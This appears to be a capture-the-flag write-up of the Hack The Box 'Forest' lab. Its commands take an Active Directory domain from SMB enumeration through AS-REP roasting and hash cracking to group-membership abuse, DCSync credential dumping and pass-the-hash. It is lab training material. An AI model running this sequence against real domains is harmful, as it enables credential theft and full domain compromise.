# Lessons Learned
- xxx
---
# After-Action Attack Sequence
- BLUF: xxx
- xxx
---
# Discover Ports & Services
- `ping` test ![[images/Pasted image 20260710194303.png]]
- `nmap` scan - light ![[images/Pasted image 20260710194426.png]]
- create comma separated `ports.txt`
```bash
cat nmap/light | grep -v "(\|nmap" | grep / | cut -d'/' -f 1 | sed -z 's/\n/,/g; s/,$/\n/' | tee ports.txt
```
![[images/Pasted image 20260710194440.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260710194815.png]]
- NOTE: material clock skew
---
# Service Enum
## Port 445 (SMB)
### Null Auth
- some success ![[images/Pasted image 20260710195151.png]]
### Shares
- no access yet ![[images/Pasted image 20260710195216.png]]
### Users
- we have the makings of `users.txt` ![[images/Pasted image 20260710195251.png]]
- create `users.txt` and edit ![[images/Pasted image 20260710195412.png]] ![[images/Pasted image 20260710195449.png]]
### Password Policy
- no worries here ![[images/Pasted image 20260710195523.png]]
---
# AD Enum
## ASREP Roasting
```bash
nxc ldap 10.129.26.140 -d htb.local -u users.txt -p '' --asreproast asrep.ou
```
- `svc_alfresco` has no pre-auth set ![[images/Pasted image 20260710195635.png]]
- crack with `hashcat -m 18200`
```bash
hashcat -m 18200 asrep.out /opt/rockyou.txt
```
- confirm creds ![[images/Pasted image 20260710200426.png]]
## Shares
- `svc_alfresco` only has access to default shares ![[images/Pasted image 20260710200505.png]]
## Kerberoasting
```bash
nxc ldap 10.129.26.140 -d htb.local -u svc-alfresco -p password --kerberoasting kerb.out
```
- nothing ![[images/Pasted image 20260710200651.png]]
## ADCS
```bash
nxc ldap 10.129.26.140 -d htb.local -u svc-alfresco -p password -M adcs
```
- nothing ![[images/Pasted image 20260710200727.png]]
## BloodHound
- Run remote ingestor
```bash
/opt/rusthound-ce -d htb.local -u
[email protected] -p password -c All -z -i 10.129.26.140
```
![[images/Pasted image 20260710201604.png]]
- Spin up container for bloodhound GUI
```bash
cd /opt/bloodhound
docker compose up -d
```
![[images/Pasted image 20260710201719.png]]
- `svc-alfresco` has serious group memberships ![[images/Pasted image 20260710202214.png]]
- other user cannot do much
- honestly this is too much info
- rerun ingestion with `bloodhound-python`
```bash
sudo bloodhound-python -u 'svc-alfresco' -p 'password' -dc forest.htb.local -ns 10.129.26.140 -d htb.local -c all
```
- we have a different path to `administrator` through `Exchange Windows Permissions`, whihc has `WriteDacl` over the domain ![[images/Pasted image 20260710212717.png]]
- confirm winrm access ![[images/Pasted image 20260710202544.png]]
- PWNED
---
# Shell as `svc-alfresco`
- `whoami /all` ![[images/Pasted image 20260710203059.png]]
- `svc-alfresco` is in `BUILTIN\Account Operators` who can modify unprotected accounts
- can also add machine accounts to the domain with `SeMachineAccountPrivilege`
- home dir ![[images/Pasted image 20260710203031.png]]
- programs ![[images/Pasted image 20260710210359.png]]
---
# Privsec
## Add `svc-alfresco` to `0rganization Managment`
- add self to `0rganization Managment`
```bash
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Organization Management' svc-alfresco
```
![[images/Pasted image 20260710204124.png]]
- targetedKerberoast
```bash
python3 targetedKerberoast.py -d htb.local -u svc-alfresco -p password --dc-ip 10.129.26.140
```
- we have TGS for all users but `administrator` ![[images/Pasted image 20260710204536.png]]
- since we saw that `sebastien` has a home dir on the box let's try to crack his TGS
- exhausted ![[images/Pasted image 20260710212240.png]]
- force change password for `administrator`
```bash
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password set password administrator password123
```
- running into errors here ![[images/Pasted image 20260710204913.png]]
- either `administrator` password cannot be reset or something else if afoot
## Add `svc-alfresco` to `Exchange Windows Permissions`
- let's change course and add `svc-alfresco` to `Exchange Windows Permissions`
- this group has `WriteDacl` over `htb.local`, which means we should be able to DCsync next
```bash
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Exchange Windows Permissions' svc-alfresco
```
![[images/Pasted image 20260710210048.png]]
- DCsync failed out ![[images/Pasted image 20260710210537.png]]
### Noticing that time is of the essence
- confirm membership
- looks like membership is being cleaned out on a periodic basis > we will have to be faster
```bash
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password get membership svc-alfresco
```
- load up commands for quick draw mode
```bash
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Exchange Windows Permissions' svc-alfresco
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password get membership svc-alfresco
bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add dcsync svc-alfresco
secretsdump.py htb.local/svc-alfresco:
[email protected]
```
- that worked ![[images/Pasted image 20260710211909.png]]
- PtH to grab `root.txt` ![[images/Pasted image 20260710211930.png]]